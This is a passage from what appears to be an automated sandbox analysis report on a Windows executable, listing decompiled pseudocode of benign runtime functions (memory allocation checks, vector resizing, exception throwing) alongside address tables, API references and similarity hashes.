                    															if(_t165 < 0x1000) {
                    																L33:
                    																return L013CDA60(_t89);
                    															} else {
                    																__eflags = _t89 & 0x0000001f;
                    																if(__eflags != 0) {
                    																	L35:
                    																	E013FDA71(_t160, _t165, _t186, __eflags);
                    																	goto L36;
                    																} else {
                    																	_t165 =  *(_t89 - 4);
                    																	__eflags = _t165 - _t89;
                    																	if(__eflags >= 0) {
                    																		L36:
                    																		E013FDA71(_t160, _t165, _t186, __eflags);
                    																		goto L37;
                    																	} else {
                    																		_t149 = _t89 - _t165;
                    																		__eflags = _t149 - 4;
                    																		if(__eflags < 0) {
                    																			L37:
                    																			E013FDA71(_t160, _t165, _t186, __eflags);
                    																			goto L38;
                    																		} else {
                    																			__eflags = _t149 - 0x23;
                    																			if(__eflags > 0) {
                    																				L38:
                    																				E013FDA71(_t160, _t165, _t186, __eflags);
                    																				asm("int3");
                    																				asm("int3");
                    																				asm("int3");
                    																				asm("int3");
                    																				asm("int3");
                    																				asm("int3");
                    																				asm("int3");
                    																				asm("int3");
                    																				asm("int3");
                    																				_t95 = _a8;
                    																				_t166 = _a4;
                    																				__eflags = _t95 - 0x15555555;
                    																				if(__eflags > 0) {
                    																					E013FDA71(_t160, _t166, _t186, __eflags);
                    																					goto L48;
                    																				} else {
                    																					__eflags = _t95 + _t95 * 2 << 2 - 0x1000;
                    																					if(_t95 + _t95 * 2 << 2 < 0x1000) {
                    																						L46:
                    																						return L013CDA60(_t166);
                    																					} else {
                    																						__eflags = _t166 & 0x0000001f;
                    																						if(__eflags != 0) {
                    																							L48:
                    																							E013FDA71(_t160, _t166, _t186, __eflags);
                    																							goto L49;
                    																						} else {
                    																							_t147 =  *(_t166 - 4);
                    																							__eflags = _t147 - _t166;
                    																							if(__eflags >= 0) {
                    																								L49:
                    																								E013FDA71(_t160, _t166, _t186, __eflags);
                    																								goto L50;
                    																							} else {
                    																								_t166 = _t166 - _t147;
                    																								__eflags = _t166 - 4;
                    																								if(__eflags < 0) {
                    																									L50:
                    																									E013FDA71(_t160, _t166, _t186, __eflags);
                    																									goto L51;
                    																								} else {
                    																									__eflags = _t166 - 0x23;
                    																									if(__eflags > 0) {
                    																										L51:
                    																										E013FDA71(_t160, _t166, _t186, __eflags);
                    																										asm("int3");
                    																										asm("int3");
                    																										asm("int3");
                    																										asm("int3");
                    																										asm("int3");
                    																										asm("int3");
                    																										asm("int3");
                    																										_t101 = _a8;
                    																										_t167 = _a4;
                    																										__eflags = _t101 - 0xaaaaaaa;
                    																										if(__eflags > 0) {
                    																											E013FDA71(_t160, _t167, _t186, __eflags);
                    																											goto L61;
                    																										} else {
                    																											__eflags = _t101 + _t101 * 2 << 3 - 0x1000;
                    																											if(_t101 + _t101 * 2 << 3 < 0x1000) {
                    																												L59:
                    																												return L013CDA60(_t167);
                    																											} else {
                    																												__eflags = _t167 & 0x0000001f;
                    																												if(__eflags != 0) {
                    																													L61:
                    																													E013FDA71(_t160, _t167, _t186, __eflags);
                    																													goto L62;
                    																												} else {
                    																													_t143 =  *(_t167 - 4);
                    																													__eflags = _t143 - _t167;
                    																													if(__eflags >= 0) {
                    																														L62:
                    																														E013FDA71(_t160, _t167, _t186, __eflags);
                    																														goto L63;
                    																													} else {
                    																														_t167 = _t167 - _t143;
                    																														__eflags = _t167 - 4;
                    																														if(__eflags < 0) {
                    																															L63:
                    																															E013FDA71(_t160, _t167, _t186, __eflags);
                    																															goto L64;
                    																														} else {
                    																															__eflags = _t167 - 0x23;
                    																															if(__eflags > 0) {
                    																																L64:
                    																																E013FDA71(_t160, _t167, _t186, __eflags);
                    																																asm("int3");
                    																																asm("int3");
                    																																asm("int3");
                    																																asm("int3");
                    																																asm("int3");
                    																																asm("int3");
                    																																asm("int3");
                    																																_t218 = _t221;
                    																																_push(0xffffffff);
                    																																_push(E01418180);
                    																																_push( *[fs:0x0]);
                    																																_push(_t160);
                    																																_t108 =  *0x1435234; // 0x78d9f939
                    																																_push(_t108 ^ _t221);
                    																																 *[fs:0x0] =  &_v16;
                    																																_v20 = _t221 - 0x10;
                    																																_t161 = _t167;
                    																																_v32 = _t161;
                    																																_t168 =  *(_t161 + 4);
                    																																_t200 = _a4;
                    																																_t188 = _t168 -  *_t161;
                    																																_t112 = 0x2aaaaaab * _t188;
                    																																_t209 = (0x2aaaaaab * _t188 >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * _t188 >> 0x20 >> 2);
                    																																_v28 = _t209;
                    																																__eflags = _t209 - _t200;
                    																																if(__eflags <= 0) {
                    																																	if(__eflags >= 0) {
                    																																		goto L71;
                    																																	} else {
                    																																		_t191 = _a8;
                    																																		__eflags = _t191 - _t168;
                    																																		if(_t191 >= _t168) {
                    																																			L76:
                    																																			__eflags = _t200 - _t209;
                    																																			E013EC250(_t161, _t161, _t209, _t218, _t200 - _t209);
                    																																		} else {
                    																																			_t129 =  *_t161;
                    																																			__eflags = _t129 - _t191;
                    																																			if(_t129 > _t191) {
                    																																				goto L76;
                    																																			} else {
                    																																				_t215 = (0x2aaaaaab * (_t191 - _t129) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t191 - _t129) >> 0x20 >> 2);
                    																																				E013EC250(_t161, _t161, _t215, _t218, _t200 - _v28);
                    																																				_a8 =  *_t161 + (_t215 + _t215 * 2) * 8;
                    																																			}
                    																																		}
                    																																		_push(_a8);
                    																																		_v8 = 0;
                    																																		_push(_t161);
                    																																		E013EABB0( *(_t161 + 4), _t200 - (0x2aaaaaab * ( *(_t161 + 4) -  *_t161) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *(_t161 + 4) -  *_t161) >> 0x20 >> 2), _a8);
                    																																		_t128 = _t200 - (0x2aaaaaab * ( *(_t161 + 4) -  *_t161) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *(_t161 + 4) -  *_t161) >> 0x20 >> 2) + (_t200 - (0x2aaaaaab * ( *(_t161 + 4) -  *_t161) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *(_t161 + 4) -  *_t161) >> 0x20 >> 2)) * 2 << 3;
                    																																		_t76 = _t161 + 4;
                    																																		 *_t76 =  *(_t161 + 4) + _t128;
                    																																		__eflags =  *_t76;
                    																																		 *[fs:0x0] = _v16;
                    																																		return _t128;
                    																																	}
                    																																} else {
                    																																	_t112 = _t168 + (_t200 - _t209 + (_t200 - _t209) * 2) * 8;
                    																																	_a8 = _t112;
                    																																	_t216 = _t112;
                    																																	__eflags = _t112 - _t168;
                    																																	if(_t112 != _t168) {
                    																																		_t205 = _t168;
                    																																		do {
                    																																			 *((intOrPtr*)( *_t216))(0);
                    																																			_t216 = _t216 + 0x18;
                    																																			__eflags = _t216 - _t205;
                    																																		} while (_t216 != _t205);
                    																																		_t112 = _a8;
                    																																	}
                    																																	 *(_t161 + 4) = _t112;
                    																																	L71:
                    																																	 *[fs:0x0] = _v16;
                    																																	return _t112;
                    																																}
                    																															} else {
                    																																_t167 = _t143;
                    																																goto L59;
                    																															}
                    																														}
                    																													}
                    																												}
                    																											}
                    																										}
                    																									} else {
                    																										_t166 = _t147;
                    																										goto L46;
                    																									}
                    																								}
                    																							}
                    																						}
                    																					}
                    																				}
                    																			} else {
                    																				_t89 = _t165;
                    																				goto L33;
                    																			}
                    																		}
                    																	}
                    																}
                    															}
                    														}
                    													} else {
                    														_t154 = _t164 + 0x00000023 & 0xffffffe0;
                    														__eflags = _t154;
                    														 *(_t154 - 4) = _t164;
                    														return _t154;
                    													}
                    												}
                    											}
                    										}
                    									} else {
                    										L14:
                    										return _t84;
                    									}
                    								} else {
                    									_t5 = _t164 + 0x23; // 0x23
                    									_t159 = _t5 & 0xffffffe0;
                    									__eflags = _t159;
                    									 *(_t159 - 4) = _t164;
                    									return _t159;
                    								}
                    							}
                    						}
                    					}
                    				} else {
                    					L1:
                    					return _t79;
                    				}
                    			}








































                    0x013ec410
                    0x013ec410
                    0x013ec410
                    0x013ec416
                    0x013ec41b
                    0x013ec420
                    0x013ec460
                    0x00000000
                    0x013ec422
                    0x013ec425
                    0x013ec428
                    0x013ec42d
                    0x013ec452
                    0x013ec457
                    0x013ec45a
                    0x013ec45c
                    0x00000000
                    0x013ec45e
                    0x00000000
                    0x013ec45e
                    0x013ec42f
                    0x013ec42f
                    0x013ec42f
                    0x013ec432
                    0x013ec434
                    0x013ec465
                    0x013ec465
                    0x00000000
                    0x013ec436
                    0x013ec43c
                    0x013ec43e
                    0x013ec441
                    0x013ec443
                    0x013ec46a
                    0x013ec46a
                    0x013ec46f
                    0x013ec46f
                    0x013ec474
                    0x013ec475
                    0x013ec476
                    0x013ec477
                    0x013ec478
                    0x013ec479
                    0x013ec47a
                    0x013ec47b
                    0x013ec47c
                    0x013ec47d
                    0x013ec47e
                    0x013ec47f
                    0x013ec480
                    0x013ec484
                    0x013ec486
                    0x013ec48b
                    0x013ec490
                    0x013ec4d0
                    0x00000000
                    0x013ec492
                    0x013ec495
                    0x013ec498
                    0x013ec49d
                    0x013ec4c2
                    0x013ec4c7
                    0x013ec4ca
                    0x013ec4cc
                    0x00000000
                    0x013ec4ce
                    0x00000000
                    0x013ec4ce
                    0x013ec49f
                    0x013ec49f
                    0x013ec4a2
                    0x013ec4a4
                    0x013ec4d5
                    0x013ec4d5
                    0x00000000
                    0x013ec4a6
                    0x013ec4ac
                    0x013ec4ae
                    0x013ec4b1
                    0x013ec4b3
                    0x013ec4da
                    0x013ec4da
                    0x013ec4df
                    0x013ec4df
                    0x013ec4e4
                    0x013ec4e5
                    0x013ec4e6
                    0x013ec4e7
                    0x013ec4e8
                    0x013ec4e9
                    0x013ec4ea
                    0x013ec4eb
                    0x013ec4ec
                    0x013ec4ed
                    0x013ec4ee
                    0x013ec4ef
                    0x013ec4f0
                    0x013ec4f4
                    0x013ec4f8
                    0x013ec4fe
                    0x013ec52e
                    0x00000000
                    0x013ec500
                    0x013ec500
                    0x013ec503
                    0x013ec509
                    0x013ec524
                    0x013ec52b
                    0x013ec50b
                    0x013ec50b
                    0x013ec50d
                    0x013ec533
                    0x013ec533
                    0x00000000
                    0x013ec50f
                    0x013ec50f
                    0x013ec512
                    0x013ec514
                    0x013ec538
                    0x013ec538
                    0x00000000
                    0x013ec516
                    0x013ec516
                    0x013ec518
                    0x013ec51b
                    0x013ec53d
                    0x013ec53d
                    0x00000000
                    0x013ec51d
                    0x013ec51d
                    0x013ec520
                    0x013ec542
                    0x013ec542
                    0x013ec547
                    0x013ec548
                    0x013ec549
                    0x013ec54a
                    0x013ec54b
                    0x013ec54c
                    0x013ec54d
                    0x013ec54e
                    0x013ec54f
                    0x013ec550
                    0x013ec554
                    0x013ec558
                    0x013ec55d
                    0x013ec590
                    0x00000000
                    0x013ec55f
                    0x013ec565
                    0x013ec56a
                    0x013ec586
                    0x013ec58d
                    0x013ec56c
                    0x013ec56c
                    0x013ec56f
                    0x013ec595
                    0x013ec595
                    0x00000000
                    0x013ec571
                    0x013ec571
                    0x013ec574
                    0x013ec576
                    0x013ec59a
                    0x013ec59a
                    0x00000000
                    0x013ec578
                    0x013ec578
                    0x013ec57a
                    0x013ec57d
                    0x013ec59f
                    0x013ec59f
                    0x00000000
                    0x013ec57f
                    0x013ec57f
                    0x013ec582
                    0x013ec5a4
                    0x013ec5a4
                    0x013ec5a9
                    0x013ec5aa
                    0x013ec5ab
                    0x013ec5ac
                    0x013ec5ad
                    0x013ec5ae
                    0x013ec5af
                    0x013ec5b0
                    0x013ec5b4
                    0x013ec5b8
                    0x013ec5bd
                    0x013ec5f0
                    0x00000000
                    0x013ec5bf
                    0x013ec5c5
                    0x013ec5ca
                    0x013ec5e6
                    0x013ec5ed
                    0x013ec5cc
                    0x013ec5cc
                    0x013ec5cf
                    0x013ec5f5
                    0x013ec5f5
                    0x00000000
                    0x013ec5d1
                    0x013ec5d1
                    0x013ec5d4
                    0x013ec5d6
                    0x013ec5fa
                    0x013ec5fa
                    0x00000000
                    0x013ec5d8
                    0x013ec5d8
                    0x013ec5da
                    0x013ec5dd
                    0x013ec5ff
                    0x013ec5ff
                    0x00000000
                    0x013ec5df
                    0x013ec5df
                    0x013ec5e2
                    0x013ec604
                    0x013ec604
                    0x013ec609
                    0x013ec60a
                    0x013ec60b
                    0x013ec60c
                    0x013ec60d
                    0x013ec60e
                    0x013ec60f
                    0x013ec611
                    0x013ec613
                    0x013ec615
                    0x013ec620
                    0x013ec624
                    0x013ec627
                    0x013ec62e
                    0x013ec632
                    0x013ec638
                    0x013ec63b
                    0x013ec63d
                    0x013ec640
                    0x013ec648
                    0x013ec64d
                    0x013ec64f
                    0x013ec659
                    0x013ec65b
                    0x013ec65e
                    0x013ec660
                    0x013ec69e
                    0x00000000
                    0x013ec6a0
                    0x013ec6a0
                    0x013ec6a3
                    0x013ec6a5
                    0x013ec6da
                    0x013ec6de
                    0x013ec6e1
                    0x013ec6a7
                    0x013ec6a7
                    0x013ec6a9
                    0x013ec6ab
                    0x00000000
                    0x013ec6ad
                    0x013ec6c6
                    0x013ec6c8
                    0x013ec6d5
                    0x013ec6d5
                    0x013ec6ab
                    0x013ec6ee
                    0x013ec6f3
                    0x013ec6fe
                    0x013ec712
                    0x013ec735
                    0x013ec738
                    0x013ec738
                    0x013ec738
                    0x013ec73e
                    0x013ec74c
                    0x013ec74c
                    0x013ec662
                    0x013ec667
                    0x013ec66a
                    0x013ec66d
                    0x013ec66f
                    0x013ec671
                    0x013ec673
                    0x013ec675
                    0x013ec67b
                    0x013ec67d
                    0x013ec680
                    0x013ec680
                    0x013ec684
                    0x013ec684
                    0x013ec687
                    0x013ec68a
                    0x013ec68d
                    0x013ec69b
                    0x013ec69b
                    0x013ec5e4
                    0x013ec5e4
                    0x00000000
                    0x013ec5e4
                    0x013ec5e2
                    0x013ec5dd
                    0x013ec5d6
                    0x013ec5cf
                    0x013ec5ca
                    0x013ec584
                    0x013ec584
                    0x00000000
                    0x013ec584
                    0x013ec582
                    0x013ec57d
                    0x013ec576
                    0x013ec56f
                    0x013ec56a
                    0x013ec522
                    0x013ec522
                    0x00000000
                    0x013ec522
                    0x013ec520
                    0x013ec51b
                    0x013ec514
                    0x013ec50d
                    0x013ec509
                    0x013ec4b5
                    0x013ec4b8
                    0x013ec4b8
                    0x013ec4bb
                    0x013ec4be
                    0x013ec4be
                    0x013ec4b3
                    0x013ec4a4
                    0x013ec49d
                    0x013ec488
                    0x013ec488
                    0x013ec488
                    0x013ec488
                    0x013ec445
                    0x013ec445
                    0x013ec448
                    0x013ec448
                    0x013ec44b
                    0x013ec44e
                    0x013ec44e
                    0x013ec443
                    0x013ec434
                    0x013ec42d
                    0x013ec418
                    0x013ec418
                    0x013ec418
                    0x013ec418

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 39272d70cb43e55991b45e1f78c67d3d5abb7d5e465461f8b86871d7cc4eb833
                    • Instruction ID: 8470b755640b0a48a2539e2067664224f3065be7f8733da4c1ead4818cdd26e9
                    • Opcode Fuzzy Hash: 39272d70cb43e55991b45e1f78c67d3d5abb7d5e465461f8b86871d7cc4eb833
                    • Instruction Fuzzy Hash: 88F027F694032646FB27EB7C844CA3E72C85E7029D700117DE726E2095EF38C8548926
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E013F7826() {
                    				signed int _t9;
                    
                    				E013F7B49();
                    				E013F7ADD();
                    				_t9 = E013FD6BE();
                    				 *((intOrPtr*)(_t9 + _t9 * 8 - 0x3fcdfc8b)) =  *((intOrPtr*)(_t9 + _t9 * 8 - 0x3fcdfc8b)) + _t9;
                    			}




                    0x013f7826
                    0x013f782b
                    0x013f7830
                    0x013f7834

                    APIs
                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 013F7826
                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 013F782B
                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 013F7830
                      • Part of subcall function 013FD6BE: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 013FD6CF
                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 013F7845
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                    • String ID:
                    • API String ID: 1761009282-0
                    • Opcode ID: 8f9118350c77b1a4c46988e2bee8df409da24fc8d7b626b4330c93c09092b791
                    • Instruction ID: 557c7848d637c0dc7716842221d341d6eeb20f02262558ffca5f4f4f9e21c6fc
                    • Opcode Fuzzy Hash: 8f9118350c77b1a4c46988e2bee8df409da24fc8d7b626b4330c93c09092b791
                    • Instruction Fuzzy Hash: B7C04C0400428750DC913EFC65066AD77044C726DCFD024EECB54176439D06080FD273
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 01402DED
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ErrorHandling__start
                    • String ID: pow
                    • API String ID: 3213639722-2276729525
                    • Opcode ID: 33c130e1e94e0b234257d54587a2fd4734dc559622fba161115b7737dad07b90
                    • Instruction ID: 006c61055f86c3faad33cc95db80cc875d38223d8e0bb0828c8aa32645c39c5f
                    • Opcode Fuzzy Hash: 33c130e1e94e0b234257d54587a2fd4734dc559622fba161115b7737dad07b90
                    • Instruction Fuzzy Hash: 1E518B71A14502D6EB237B1BC98476B2B949B50710F208EBFE0C5823F9DA7488D29B86
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E013CFBF0(void* __ecx, intOrPtr* _a4) {
                    				char _v8;
                    				char _v16;
                    				signed int _v20;
                    				intOrPtr _v24;
                    				char _v28;
                    				char _v44;
                    				intOrPtr _v48;
                    				char _v60;
                    				intOrPtr _v64;
                    				char _v68;
                    				char _v84;
                    				void* _v88;
                    				char _v92;
                    				char _v96;
                    				char _v104;
                    				char _v108;
                    				char _v112;
                    				void* __ebp;
                    				signed int _t44;
                    				signed int _t45;
                    				char _t49;
                    				void* _t57;
                    				char _t78;
                    				void* _t79;
                    				void* _t80;
                    				void* _t84;
                    				void* _t85;
                    				signed int _t87;
                    
                    				_t44 =  *0x1435234; // 0x78d9f939
                    				_t45 = _t44 ^ _t87;
                    				_v20 = _t45;
                    				 *[fs:0x0] =  &_v16;
                    				_t80 = __ecx;
                    				_v96 = 0xffffffff;
                    				_v92 = 0;
                    				_v88 = 0;
                    				_v108 = 0;
                    				_v104 = 0;
                    				_v112 = 0;
                    				_v8 = 3;
                    				_t49 =  *((intOrPtr*)( *((intOrPtr*)( *_a4 + 4))))("InputBuffer", 0x1435f20,  &_v112, _t45, _t79, _t84,  *[fs:0x0], E01416B36, 0xffffffff);
                    				_t92 = _t49;
                    				if(_t49 == 0) {
                    					_v64 = 0xf;
                    					_v68 = 0;
                    					_v84 = _t49;
                    					E013C64B7( &_v84, _t92, "StringStore: missing InputBuffer argument", 0x29);
                    					asm("xorps xmm0, xmm0");
                    					asm("movq [ebp-0x34], xmm0");
                    					_v8 = 5;
                    					_v60 = 0x141a7b8;
                    					_v48 = 1;
                    					_v24 = 0xf;
                    					_v28 = 0;
                    					_v44 = 0;
                    					E013C63D3( &_v44,  &_v112,  &_v84, 0, 0xffffffff);
                    					_v8 = 4;
                    					_v60 = 0x141a97c;
                    					E013F4EC6( &_v60, 0x1430adc);
                    				}
                    				_t85 = _v88;
                    				_t78 = _v92;
                    				_t51 =  !=  ? _t85 : _v108;
                    				 *((intOrPtr*)(_t80 + 0x14)) =  !=  ? _t85 : _v108;
                    				_t53 =  !=  ? _t78 : _v104;
                    				 *((intOrPtr*)(_t80 + 0x1c)) = 0;
                    				 *((intOrPtr*)(_t80 + 0x18)) =  !=  ? _t78 : _v104;
                    				_v8 = 6;
                    				_t68 =  >=  ?  &_v92 :  &_v96;
                    				_t69 =  *( >=  ?  &_v92 :  &_v96);
                    				memset(_t85, 0,  *( >=  ?  &_v92 :  &_v96) << 0);
                    				_t57 = L013CDA60(_t85);
                    				 *[fs:0x0] = _v16;
                    				return E013F268B(_t57, _v20 ^ _t87);
                    			}































                    0x013cfc04
                    0x013cfc09
                    0x013cfc0b
                    0x013cfc14
                    0x013cfc1a
                    0x013cfc1f
                    0x013cfc26
                    0x013cfc2d
                    0x013cfc34
                    0x013cfc3b
                    0x013cfc42
                    0x013cfc59
                    0x013cfc60
                    0x013cfc62
                    0x013cfc64
                    0x013cfc70
                    0x013cfc77
                    0x013cfc7e
                    0x013cfc81
                    0x013cfc86
                    0x013cfc89
                    0x013cfc95
                    0x013cfc9d
                    0x013cfca4
                    0x013cfcab
                    0x013cfcb2
                    0x013cfcb9
                    0x013cfcbd
                    0x013cfcca
                    0x013cfccf
                    0x013cfcd6
                    0x013cfcd6
                    0x013cfce3
                    0x013cfce6
                    0x013cfce9
                    0x013cfcec
                    0x013cfcf2
                    0x013cfcf5
                    0x013cfcfc
                    0x013cfd08
                    0x013cfd0f
                    0x013cfd17
                    0x013cfd19
                    0x013cfd1b
                    0x013cfd26
                    0x013cfd3d

                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013CFCD6
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    • StringStore: missing InputBuffer argument, xrefs: 013CFC68
                    • InputBuffer, xrefs: 013CFC51
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ExceptionException@8RaiseThrow
                    • String ID: InputBuffer$StringStore: missing InputBuffer argument
                    • API String ID: 3976011213-2380213735
                    • Opcode ID: 0742f128a883ae7c55e51f8b1c436f5a67622528310fd416eb75b0bfe1be8fe9
                    • Instruction ID: 1b50ffc5c463838e91b1f8faec151354d925ee076a39ae8b0a6615bb1478250c
                    • Opcode Fuzzy Hash: 0742f128a883ae7c55e51f8b1c436f5a67622528310fd416eb75b0bfe1be8fe9
                    • Instruction Fuzzy Hash: AE4118B0E04289EBDB00CF99D954BDEBBF4AF59714F20421EE415AB384D7B55A48CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 61%
                    			E013E8060(void* __ebx, void* __ecx, intOrPtr _a4, intOrPtr _a8, void* _a12, void* _a16) {
                    				char _v8;
                    				char _v16;
                    				signed int _v20;
                    				char _v60;
                    				char _v84;
                    				char _v108;
                    				char _v132;
                    				char _v156;
                    				char _v180;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t30;
                    				signed int _t31;
                    				void* _t44;
                    				void* _t46;
                    				void* _t48;
                    				void* _t50;
                    				void* _t73;
                    				intOrPtr _t76;
                    				signed int _t79;
                    
                    				_push(0xffffffff);
                    				_push(E014178FE);
                    				_push( *[fs:0x0]);
                    				_t30 =  *0x1435234; // 0x78d9f939
                    				_t31 = _t30 ^ _t79;
                    				_v20 = _t31;
                    				_push(_t31);
                    				 *[fs:0x0] =  &_v16;
                    				_t73 = __ecx;
                    				_t76 = _a4;
                    				if( *((char*)(__ecx + 8)) == 0) {
                    					E013D2390();
                    					_push( &_v180);
                    					_push(0x14380c8);
                    					_push(_t76);
                    					_v8 = 0;
                    					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)))) + 4))))() == 0) {
                    						_t44 = E013C2AD0( &_v84, E013F4DFB(__ecx, 0x1437448, 0x1439f60));
                    						_v8 = 1;
                    						_t46 = E013C1DF7(__ebx,  &_v84,  &_v180,  &_v108, _t44, ": Missing required parameter \'");
                    						_v8 = 2;
                    						_t48 = E013C1DF7(__ebx,  &_v84,  &_v180,  &_v132, _t46, _t76);
                    						_v8 = 3;
                    						_t50 = E013C1DF7(__ebx,  &_v84,  &_v180,  &_v156, _t48, 0x141a9b4);
                    						_v8 = 4;
                    						E013CB190(_t50);
                    						E013F4EC6( &_v60, 0x1430adc);
                    					}
                    					_a8( &_v180);
                    					E013C3D26( &_v180);
                    				}
                    				 *[fs:0x0] = _v16;
                    				return E013F268B(_t73, _v20 ^ _t79);
                    			}























                    0x013e8063
                    0x013e8065
                    0x013e8070
                    0x013e8077
                    0x013e807c
                    0x013e807e
                    0x013e8083
                    0x013e8087
                    0x013e808d
                    0x013e8093
                    0x013e8096
                    0x013e80a2
                    0x013e80b0
                    0x013e80b1
                    0x013e80b6
                    0x013e80b9
                    0x013e80c7
                    0x013e80df
                    0x013e80ed
                    0x013e80f2
                    0x013e80fc
                    0x013e8101
                    0x013e8112
                    0x013e8117
                    0x013e8123
                    0x013e8127
                    0x013e8135
                    0x013e8135
                    0x013e8156
                    0x013e815f
                    0x013e815f
                    0x013e8169
                    0x013e8180

                    APIs
                    • ___std_type_info_name.LIBVCRUNTIME ref: 013E80D3
                      • Part of subcall function 013F4DFB: ___unDName.LIBVCRUNTIME ref: 013F4E2E
                      • Part of subcall function 013F4DFB: InterlockedPushEntrySList.KERNEL32(?,?,?,?,01439F60,?,?,?,?,00000000,?), ref: 013F4EA2
                      • Part of subcall function 013F4DFB: _free.LIBCMT ref: 013F4EAF
                      • Part of subcall function 013F4DFB: _free.LIBCMT ref: 013F4EB7
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013E8135
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    • : Missing required parameter ', xrefs: 013E80E4
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: _free$EntryExceptionException@8InterlockedListNamePushRaiseThrow___std_type_info_name___un
                    • String ID: : Missing required parameter '
                    • API String ID: 1968048711-3540594642
                    • Opcode ID: 6173724c61c2c93aca8c4b32a1e1355046412f9c993f9df8d12eb5ca46510608
                    • Instruction ID: cbed5ede18fa1e978674468f1e704a6247133aefc8c6b1393a0985b6890b6525
